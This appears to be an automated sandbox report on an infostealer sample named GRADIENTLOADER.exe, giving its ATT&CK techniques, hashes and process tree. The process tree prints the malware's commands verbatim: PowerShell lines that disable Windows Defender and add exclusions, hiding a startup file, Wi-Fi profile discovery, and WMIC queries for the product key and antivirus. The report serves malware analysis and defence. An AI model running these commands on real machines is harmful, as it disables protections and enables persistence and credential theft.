8c030073c10ea9058edfb91eb8d8b60ed10a8844690a8321b8f65ab56951d268

Analysis

max time kernel
138s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-08-2024 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GRADIENTLOADER.exe
Size

77.3MB
MD5

033068e1bd57cbc0c3643875c82c03eb
SHA1

7c7a25f00bacb09677781098e9c7818972599cc5
SHA256

cadf54b2cb4ac1ee63f3b1908385c1ad43e1a713e724f81b5ecd5b6c31bd235f
SHA512

586009d992246194d36e396cfecafcec94c741c714669a2ed28d5ca029ab31efc7b6aa9684da551b9a9df582072d77aae09ab2245c0f86ea941194ef2adfdd52
SSDEEP

1572864:gxB7vFQqMrlpA+Ql4VddvIe6MqQZ19Wb04xhMk:gxBJyklAdvNF/9e0eh

Score

9^/10

credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2904	powershell.exe
1252	powershell.exe
3612	powershell.exe
3860	powershell.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎‎.scr	GRADIENTLOADER.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎‎.scr	GRADIENTLOADER.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎‎.scr	attrib.exe

Loads dropped DLL 57 IoCs

pid	Process
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral10/files/0x0007000000023912-1672.dat	upx
behavioral10/memory/3144-1676-0x00007FFD66E70000-0x00007FFD67534000-memory.dmp	upx
behavioral10/files/0x000700000002350b-1678.dat	upx
behavioral10/files/0x000700000002354f-1685.dat	upx
behavioral10/memory/3144-1687-0x00007FFD7B0F0000-0x00007FFD7B0FF000-memory.dmp	upx
behavioral10/files/0x0007000000023509-1686.dat	upx
behavioral10/memory/3144-1684-0x00007FFD763D0000-0x00007FFD763F5000-memory.dmp	upx
behavioral10/files/0x000700000002350d-1691.dat	upx
behavioral10/memory/3144-1718-0x00007FFD747F0000-0x00007FFD7481D000-memory.dmp	upx
behavioral10/files/0x0007000000023517-1719.dat	upx
behavioral10/files/0x0007000000023910-1695.dat	upx
behavioral10/files/0x0007000000023915-1726.dat	upx
behavioral10/memory/3144-1732-0x00007FFD66E70000-0x00007FFD67534000-memory.dmp	upx
behavioral10/memory/3144-1733-0x00007FFD72D80000-0x00007FFD72D94000-memory.dmp	upx
behavioral10/memory/3144-1735-0x00007FFD763D0000-0x00007FFD763F5000-memory.dmp	upx
behavioral10/memory/3144-1734-0x00007FFD66940000-0x00007FFD66E69000-memory.dmp	upx
behavioral10/files/0x000700000002354e-1731.dat	upx
behavioral10/files/0x000700000002350c-1730.dat	upx
behavioral10/files/0x0007000000023513-1736.dat	upx
behavioral10/files/0x0007000000023550-1738.dat	upx
behavioral10/memory/3144-1740-0x00007FFD67820000-0x00007FFD678ED000-memory.dmp	upx
behavioral10/memory/3144-1737-0x00007FFD6DCE0000-0x00007FFD6DD13000-memory.dmp	upx
behavioral10/memory/3144-1729-0x00007FFD76310000-0x00007FFD7631D000-memory.dmp	upx
behavioral10/files/0x0007000000023510-1728.dat	upx
behavioral10/memory/3144-1727-0x00007FFD76870000-0x00007FFD7687D000-memory.dmp	upx
behavioral10/memory/3144-1725-0x00007FFD73D30000-0x00007FFD73D49000-memory.dmp	upx
behavioral10/files/0x0007000000023511-1724.dat	upx
behavioral10/memory/3144-1723-0x00007FFD73190000-0x00007FFD731C6000-memory.dmp	upx
behavioral10/memory/3144-1721-0x00007FFD77570000-0x00007FFD7757F000-memory.dmp	upx
behavioral10/files/0x0007000000023516-1715.dat	upx
behavioral10/files/0x0007000000023515-1714.dat	upx
behavioral10/files/0x0007000000023514-1713.dat	upx
behavioral10/files/0x0007000000023512-1711.dat	upx
behavioral10/files/0x000700000002350f-1708.dat	upx
behavioral10/files/0x000700000002350e-1707.dat	upx
behavioral10/files/0x000b000000023429-1705.dat	upx
behavioral10/files/0x000700000002350a-1704.dat	upx
behavioral10/files/0x0007000000023508-1703.dat	upx
behavioral10/files/0x0007000000023ced-1702.dat	upx
behavioral10/files/0x0007000000023ce0-1700.dat	upx
behavioral10/files/0x0007000000023c7a-1699.dat	upx
behavioral10/files/0x0007000000023917-1698.dat	upx
behavioral10/memory/3144-1745-0x00007FFD77570000-0x00007FFD7757F000-memory.dmp	upx
behavioral10/memory/3144-1744-0x00007FFD6E370000-0x00007FFD6E382000-memory.dmp	upx
behavioral10/memory/3144-1743-0x00007FFD72D60000-0x00007FFD72D76000-memory.dmp	upx
behavioral10/files/0x0007000000023916-1697.dat	upx
behavioral10/memory/3144-1690-0x00007FFD74820000-0x00007FFD7483A000-memory.dmp	upx
behavioral10/files/0x0007000000023cf0-1747.dat	upx
behavioral10/memory/3144-1748-0x00007FFD67790000-0x00007FFD67817000-memory.dmp	upx
behavioral10/files/0x000700000002351d-1749.dat	upx
behavioral10/files/0x000700000002351e-1751.dat	upx
behavioral10/memory/3144-1754-0x00007FFD6DCB0000-0x00007FFD6DCD7000-memory.dmp	upx
behavioral10/memory/3144-1753-0x00007FFD76400000-0x00007FFD7640B000-memory.dmp	upx
behavioral10/memory/3144-1756-0x00007FFD66620000-0x00007FFD6673B000-memory.dmp	upx
behavioral10/memory/3144-1759-0x00007FFD72D80000-0x00007FFD72D94000-memory.dmp	upx
behavioral10/memory/3144-1760-0x00007FFD67AB0000-0x00007FFD67AC8000-memory.dmp	upx
behavioral10/memory/3144-1764-0x00007FFD6DCE0000-0x00007FFD6DD13000-memory.dmp	upx
behavioral10/memory/3144-1763-0x00007FFD66150000-0x00007FFD662CF000-memory.dmp	upx
behavioral10/memory/3144-1762-0x00007FFD67A80000-0x00007FFD67AA4000-memory.dmp	upx
behavioral10/memory/3144-1761-0x00007FFD66940000-0x00007FFD66E69000-memory.dmp	upx
behavioral10/memory/3144-1767-0x00007FFD75650000-0x00007FFD7565B000-memory.dmp	upx
behavioral10/memory/3144-1768-0x00007FFD755B0000-0x00007FFD755BC000-memory.dmp	upx
behavioral10/memory/3144-1766-0x00007FFD75F00000-0x00007FFD75F0B000-memory.dmp	upx
behavioral10/memory/3144-1765-0x00007FFD67820000-0x00007FFD678ED000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
27	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	ip-api.com

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1504	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5020	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4512	WMIC.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-945322488-2060912225-3527527000-1000\{DE2A47A3-395B-4660-AE90-B533AEFCEA2D}	GRADIENTLOADER.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3144	GRADIENTLOADER.exe
3860	powershell.exe
3860	powershell.exe
2904	powershell.exe
2904	powershell.exe
1252	powershell.exe
1252	powershell.exe
3612	powershell.exe
3612	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3144	GRADIENTLOADER.exe
Token: SeDebugPrivilege	3860	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeIncreaseQuotaPrivilege	2808	WMIC.exe
Token: SeSecurityPrivilege	2808	WMIC.exe
Token: SeTakeOwnershipPrivilege	2808	WMIC.exe
Token: SeLoadDriverPrivilege	2808	WMIC.exe
Token: SeSystemProfilePrivilege	2808	WMIC.exe
Token: SeSystemtimePrivilege	2808	WMIC.exe
Token: SeProfSingleProcessPrivilege	2808	WMIC.exe
Token: SeIncBasePriorityPrivilege	2808	WMIC.exe
Token: SeCreatePagefilePrivilege	2808	WMIC.exe
Token: SeBackupPrivilege	2808	WMIC.exe
Token: SeRestorePrivilege	2808	WMIC.exe
Token: SeShutdownPrivilege	2808	WMIC.exe
Token: SeDebugPrivilege	2808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2808	WMIC.exe
Token: SeRemoteShutdownPrivilege	2808	WMIC.exe
Token: SeUndockPrivilege	2808	WMIC.exe
Token: SeManageVolumePrivilege	2808	WMIC.exe
Token: 33	2808	WMIC.exe
Token: 34	2808	WMIC.exe
Token: 35	2808	WMIC.exe
Token: 36	2808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2808	WMIC.exe
Token: SeSecurityPrivilege	2808	WMIC.exe
Token: SeTakeOwnershipPrivilege	2808	WMIC.exe
Token: SeLoadDriverPrivilege	2808	WMIC.exe
Token: SeSystemProfilePrivilege	2808	WMIC.exe
Token: SeSystemtimePrivilege	2808	WMIC.exe
Token: SeProfSingleProcessPrivilege	2808	WMIC.exe
Token: SeIncBasePriorityPrivilege	2808	WMIC.exe
Token: SeCreatePagefilePrivilege	2808	WMIC.exe
Token: SeBackupPrivilege	2808	WMIC.exe
Token: SeRestorePrivilege	2808	WMIC.exe
Token: SeShutdownPrivilege	2808	WMIC.exe
Token: SeDebugPrivilege	2808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2808	WMIC.exe
Token: SeRemoteShutdownPrivilege	2808	WMIC.exe
Token: SeUndockPrivilege	2808	WMIC.exe
Token: SeManageVolumePrivilege	2808	WMIC.exe
Token: 33	2808	WMIC.exe
Token: 34	2808	WMIC.exe
Token: 35	2808	WMIC.exe
Token: 36	2808	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2308	wmic.exe
Token: SeSecurityPrivilege	2308	wmic.exe
Token: SeTakeOwnershipPrivilege	2308	wmic.exe
Token: SeLoadDriverPrivilege	2308	wmic.exe
Token: SeSystemProfilePrivilege	2308	wmic.exe
Token: SeSystemtimePrivilege	2308	wmic.exe
Token: SeProfSingleProcessPrivilege	2308	wmic.exe
Token: SeIncBasePriorityPrivilege	2308	wmic.exe
Token: SeCreatePagefilePrivilege	2308	wmic.exe
Token: SeBackupPrivilege	2308	wmic.exe
Token: SeRestorePrivilege	2308	wmic.exe
Token: SeShutdownPrivilege	2308	wmic.exe
Token: SeDebugPrivilege	2308	wmic.exe
Token: SeSystemEnvironmentPrivilege	2308	wmic.exe
Token: SeRemoteShutdownPrivilege	2308	wmic.exe
Token: SeUndockPrivilege	2308	wmic.exe
Token: SeManageVolumePrivilege	2308	wmic.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1012 wrote to memory of 3144	1012	GRADIENTLOADER.exe	87
PID 1012 wrote to memory of 3144	1012	GRADIENTLOADER.exe	87
PID 3144 wrote to memory of 1504	3144	GRADIENTLOADER.exe	93
PID 3144 wrote to memory of 1504	3144	GRADIENTLOADER.exe	93
PID 1504 wrote to memory of 5116	1504	cmd.exe	95
PID 1504 wrote to memory of 5116	1504	cmd.exe	95
PID 3144 wrote to memory of 4840	3144	GRADIENTLOADER.exe	96
PID 3144 wrote to memory of 4840	3144	GRADIENTLOADER.exe	96
PID 4840 wrote to memory of 3860	4840	cmd.exe	98
PID 4840 wrote to memory of 3860	4840	cmd.exe	98
PID 3144 wrote to memory of 1344	3144	GRADIENTLOADER.exe	99
PID 3144 wrote to memory of 1344	3144	GRADIENTLOADER.exe	99
PID 1344 wrote to memory of 2904	1344	cmd.exe	101
PID 1344 wrote to memory of 2904	1344	cmd.exe	101
PID 1344 wrote to memory of 1252	1344	cmd.exe	102
PID 1344 wrote to memory of 1252	1344	cmd.exe	102
PID 1344 wrote to memory of 3612	1344	cmd.exe	103
PID 1344 wrote to memory of 3612	1344	cmd.exe	103
PID 3144 wrote to memory of 5020	3144	GRADIENTLOADER.exe	104
PID 3144 wrote to memory of 5020	3144	GRADIENTLOADER.exe	104
PID 3144 wrote to memory of 1588	3144	GRADIENTLOADER.exe	108
PID 3144 wrote to memory of 1588	3144	GRADIENTLOADER.exe	108
PID 1588 wrote to memory of 2808	1588	cmd.exe	110
PID 1588 wrote to memory of 2808	1588	cmd.exe	110
PID 3144 wrote to memory of 2308	3144	GRADIENTLOADER.exe	111
PID 3144 wrote to memory of 2308	3144	GRADIENTLOADER.exe	111
PID 3144 wrote to memory of 4540	3144	GRADIENTLOADER.exe	113
PID 3144 wrote to memory of 4540	3144	GRADIENTLOADER.exe	113
PID 4540 wrote to memory of 4512	4540	cmd.exe	115
PID 4540 wrote to memory of 4512	4540	cmd.exe	115
PID 3144 wrote to memory of 400	3144	GRADIENTLOADER.exe	116
PID 3144 wrote to memory of 400	3144	GRADIENTLOADER.exe	116
PID 400 wrote to memory of 4236	400	cmd.exe	118
PID 400 wrote to memory of 4236	400	cmd.exe	118
PID 3144 wrote to memory of 5004	3144	GRADIENTLOADER.exe	119
PID 3144 wrote to memory of 5004	3144	GRADIENTLOADER.exe	119
PID 5004 wrote to memory of 4648	5004	cmd.exe	121
PID 5004 wrote to memory of 4648	5004	cmd.exe	121
PID 3144 wrote to memory of 2436	3144	GRADIENTLOADER.exe	122
PID 3144 wrote to memory of 2436	3144	GRADIENTLOADER.exe	122
PID 2436 wrote to memory of 2884	2436	cmd.exe	124
PID 2436 wrote to memory of 2884	2436	cmd.exe	124
PID 3144 wrote to memory of 1504	3144	GRADIENTLOADER.exe	125
PID 3144 wrote to memory of 1504	3144	GRADIENTLOADER.exe	125
PID 1504 wrote to memory of 4180	1504	cmd.exe	127
PID 1504 wrote to memory of 4180	1504	cmd.exe	127

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5116	attrib.exe

C:\Users\Admin\AppData\Local\Temp\GRADIENTLOADER.exe
"C:\Users\Admin\AppData\Local\Temp\GRADIENTLOADER.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1012
- C:\Users\Admin\AppData\Local\Temp\GRADIENTLOADER.exe
  "C:\Users\Admin\AppData\Local\Temp\GRADIENTLOADER.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎‎.scr"
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ‎‎.scr"
      4⤵
      Drops startup file
      Views/modifies file attributes
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2904
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3612
- - C:\Windows\SYSTEM32\netsh.exe
    netsh wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2808
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path softwarelicensingservice get OA3xOriginalProductKey
      4⤵
      PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI10122\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\VCRUNTIME140_1.dll

Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_asyncio.pyd

Filesize
37KB

MD5
6880e3d5872fefa9810753e181cf3033

SHA1
e875467792bbe3c4117040f6cf935a7a60a21d55

SHA256
c7000207e8c406f3a18b006649248906963834ff901c7b8b9f627d534e31575b

SHA512
f501bfe8300b20a621d587d9a86e1228ab90da5f4cab8ed47a2822617ca5eeaf66691756228745ff24084ba481f6b3eedcddfc4a4869cd56334e8ca53a92148d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_bz2.pyd

Filesize
48KB

MD5
ab542da47a7745a2f588ca78d41734e0

SHA1
d8f1601548510333e35199e3b6bb4eaf994ca9ae

SHA256
4aba601dd528a85dad5975daf6aa394002c8a38582e4abb05a89684f52130084

SHA512
d80228ae846c562e08b08b92796e871e546760cd8ed92cbbe526675947ea2a5524ff4a93210e820c9f646912db24ff112ed2a354fc018a53a5161934c7fbd0f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_cffi_backend.cp312-win_amd64.pyd

Filesize
71KB

MD5
5225e3fc11136d4ad314367fa911a8b1

SHA1
c2cfb71d867e59f29d394131e0e6c8a2e71dee32

SHA256
08005b24e71411fc4acdb312a4558339595b1d12c6917f8d50c6166a9f122abe

SHA512
87bdeacaca87dc465de92fe8dda425560c5e6e149883113f4541f2d5ecc59f57523cde41ad48fa0081f820678182648afbf73839c249fe3f7d493dcf94e76248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_ctypes.pyd

Filesize
59KB

MD5
fc609234e81821c069d54a7c8d4a7e05

SHA1
9aef96aa0276feb2df28ce0abf4ec1f2f766d011

SHA256
506cdca8f4cc4754a78edac3be230a5ec7ca4a0d61ef08fe0accab4080b2c69e

SHA512
bea687c1a9ed32db6c99be1c8689ac9e498f0ffce74c0c66c6c7653d58b6ee90e50df66c8a48b49854d47142fa9a930047f4828651193f7a500ae7fbc1882d2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_decimal.pyd

Filesize
107KB

MD5
e3245ba10c125de02593c0a67669ab17

SHA1
6b846b98ee8f663aa39d3c6c960df8bc84d82193

SHA256
306cc1df8631d632e9831d6a710c8776784c4655b107424290338c385e743026

SHA512
26c4d7280a93dc004b0a92689c43b9bcb6c0afa282d24581051fd18d0037499c2c77431636ca20a9225af002f254526cf66ff466b3b7fad0d73b8096ce1594fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_hashlib.pyd

Filesize
35KB

MD5
fa6ae459e8a2c3071bd373da5a4cfe18

SHA1
dbf6462e952efe70f4ad72c0c8688456833462d5

SHA256
20af24170652420bc06adbb2fc159ae9e61e71f2cad5370b423c9ce4c57ad5e1

SHA512
9846f7fcf86fd67b03080a6ec270e4c6ecb0fee7bd0019fddd976c26e062c5d41f35691384a2307ca80289010f73cecf7326d7f446971639698b2948c4f67c08

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_lzma.pyd

Filesize
86KB

MD5
ed15089e3c0c1b2ab5b73354abf0087b

SHA1
f51ade203d249e27ebf9ae2159220fabdb8726c0

SHA256
02fe60ad99452d53294514e8c6b8d95d79cc013742e3a4cd74b36601fc3fb09b

SHA512
a9f869b2988057c37d14ee56495ecbf2ec688517203a7e2d1bc1488f4d37c6e3d3fb6fb439442c86679a9cebbbd5b2e7b11d42f64bdbce7212b6411cd27073ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10122\_multiprocessing.pyd

Filesize
27KB

MD5
a2de86f88aad5c050f86d258b1f05617

SHA1
11824bbb09e5ee9865cadcbbfda1e0664c6d98ff

SHA256
f10fc80b19740eceb7fdce89c30d6670c9af7ed600fa7f881d27b8b5a054495f

SHA512
3662a8e6afa6b385a3e2682a49b0ae57f0f2aefc029eaaf841a228ec76c0f79c4e963b6f22eb345f4cad72b35bd72576a79a282d9816cf9b37b762773c10a80b

Download Submit
